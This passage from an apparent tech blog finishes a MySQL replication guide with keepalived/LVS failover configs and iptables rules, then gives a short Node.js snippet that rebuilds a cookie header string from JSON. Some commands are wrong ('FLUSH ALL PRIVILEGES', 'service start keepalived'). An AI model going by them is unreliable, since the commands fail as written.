  20. Make sure these two values set to ‘YES’ and waiting for master to send event and NO Errors:

    Slave_IO_State: Waiting for master to send event
    Slave_IO_Running: Yes
    Slave_SQL_Running: Yes
    
  21. GRANT privileges for normal database access for the Web App on the NEW server: Example:

    mysql> GRANT ALL PRIVILEGES ON mydatabase.* to ‘<the db user>’@’<the web app server IP>’ IDENTIFIED BY ‘<the password for the db user>’;
    mysql> FLUSH ALL PRIVILEGES;  
    

LVS (KeepaliveD)

We will need two servers (each can be low spec server with 2 Cores and at least 2GB RAM) which will be used for network high-availability and load balancing.

Assuming the IP address are as follows:

MASTER LVS: 192.168.1.20
BACKUP LVS: 192.168.1.21
CURRENT MYSQL SERVER: 192.168.1.10
NEW MYSQL SERVER: 192.168.1.11
Virtual (Floating IP) – **No need to be configured on any server’s interfaces, will be managed by keepalived**: 192.168.1.30

Change the IP in the configuration according to your infrastructure setup!

In both MASTER and BACKUP LVS server, download and install keepalived and ipvsadm $ sudo apt-get install keepalived ipvsadm

Add this configuration to MASTER LVS (192.168.1.20) in /etc/keepalived/keepalived.conf:

global_defs {
    router_id LVS_MYPROJECT
}
vrrp_instance VI_1 {
    state MASTER
    # monitored interface
    interface eth0
    # virtual router's ID
    virtual_router_id 51
    # set priority (change this value on each server)
    # (large number means priority is high)
    priority 101
    nopreempt
    # VRRP sending interval
    advert_int 1
    # authentication info between Keepalived servers
    authentication {
        auth_type PASS
        auth_pass mypassword
    }

    virtual_ipaddress {
        # virtual IP address
        192.168.1.30 dev eth0
    }
}
virtual_server 192.168.1.30 3306 {
    # monitored interval
    delay_loop 3
    # distribution method
    lvs_sched rr
    # routing method
    lvs_method DR
    protocol TCP

    # backend server#1
    real_server 192.168.1.10 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }

    # backend server#2
    real_server 192.168.1.11 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }
}

Add this configuration to BACKUP LVS (192.168.1.21) in /etc/keepalived/keepalived.conf:

global_defs {
    router_id LVS_MYPROJECT
}
vrrp_instance VI_1 {
    state BACKUP
    # monitored interface
    interface eth0
    # virtual router's ID
    virtual_router_id 51
    # set priority (change this value on each server)
    # (large number means priority is high)
    priority 100
    nopreempt
    # VRRP sending interval
    advert_int 1
    # authentication info between Keepalived servers
    authentication {
        auth_type PASS
        auth_pass mypassword
    }

    virtual_ipaddress {
        # virtual IP address
        192.168.1.30 dev eth0
    }
}
virtual_server 192.168.1.30 3306 {
    # monitored interval
    delay_loop 3
    # distribution method
    lvs_sched rr
    # routing method
    lvs_method DR
    protocol TCP

    # backend server#1
    real_server 192.168.1.10 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }
    # backend server#2
    real_server 192.168.1.11 3306 {
        weight 1
        TCP_CHECK {
        connect_timeout 10
        nb_get_retry 3
        delay_before_retry 3
        connect_port 3306
        }
    }
}

Lastly, start the KeepaliveD services on both MASTER LVS and BACKUP LVS: $ sudo service start keepalived

Final setup

In this final setup, we will configure the Web app to use KeepaliveD’s Virtual IP (192.168.1.30) and create some firewall rules on both the MySQL DATABASE SERVER, NOT LVS SERVER.

  1. $ sudo iptables -t nat -A PREROUTING -d 192.168.1.30 -j REDIRECT
  2. edit /etc/rc.local on the MySQL Database servers to make the firewall rule persistent

    #!/bin/sh -e
    #
    # rc.local
    #
    # This script is executed at the end of each multiuser runlevel.
    # Make sure that the script will "exit 0" on success or any other
    # value on error.
    #
    # In order to enable or disable this script just change the execution
    # bits.
    #
    # By default this script does nothing.
    /sbin/iptables -t nat -A PREROUTING -d 192.168.1.30 -j REDIRECT
    exit 0
    
  3. $ chmod 755 /etc/rc.local
  4. Edit the .env file to use the Virtual IP (Example in our setup: 192.168.1.30)
  5. Start the Web Application

Notes

Make sure that either MySQL servers are shut down safely (eg. shutdown –h now) and do not perform a HARD shutdown/reset as it will make the database out of sync with each other.

We can now shutdown either one MySQL database or one of the LVS and the other will keep running.

Parsing cookies stored in JSON
Feb 2, 2017

Sometimes, you will have to store cookie data and you would store it in JSON with JSON.stringify.

How would you parse out the cookie in JSON format back into a string separated by semicolons?

Here is how you would parse it back to a string (requires Node.JS):

Assuming your cookie_file.txt contains the follows:

[{"domain":".domain.com","httponly":false,"name":"presence","path":"/","secure":true,
  "value":"EDvF3EtimeF1486031553EuserFA2616400242A2EstateFDutF148asdasd1231235CEchFDp_5f616400242F3CC"},
  {"domain":".domain.com","httponly":false,"name":"p","path":"/","secure":false,"value":"-2"}]

The code to parse back the cookie that is stored in JSON:

var fs = require('fs');

fs.readFile('./cookie_file.txt', function read(err, data){
   var cookies = JSON.parse(data);
   baked_cookies = [];
   cookies.forEach(function(cookie){
     var add_ingredients = cookie.name + '=' + cookie.value + ';';
     baked_cookies.push(add_ingredients);
   });

   baked_cookies = baked_cookies.join(' ').slice(0, -1);
   console.log(baked_cookies);
});

Assuming the above code is saved as cookie_parser.js, you can run it like this:

node cookie_parser.js

output: presence=EDvF3EtimeF1486031553EuserFA2616400242A2EstateFDutF148asdasd1231235CEchFDp_5f616400242F3CC; p=-2